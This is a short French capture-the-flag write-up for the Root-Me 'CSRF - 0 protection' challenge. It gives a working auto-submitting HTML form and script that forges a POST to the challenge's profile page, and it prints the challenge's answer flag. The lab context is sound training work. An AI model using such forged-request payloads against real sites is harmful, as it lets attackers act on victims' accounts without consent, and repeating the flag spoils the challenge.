# CSRF - 0 protection https://www.root-me.org/fr/Challenges/Web-Client/CSRF-0-protection Étant donné qu'il n'y a pas de token CSRF, une injection peut être faites sans problème via une forme: <div> <form name="crcf" action="http://challenge01.root-me.org/web-client/ch22/?action=profile" method="POST"> <input type="text" name="username" value="user"/> <input type="checkbox" name="status" checked/> </form> <script> document.crcf.submit() </script> </div> Ainsi nous pouvons valider notre compte et récupérer le token: Csrf_Fr33style-L3v3l1!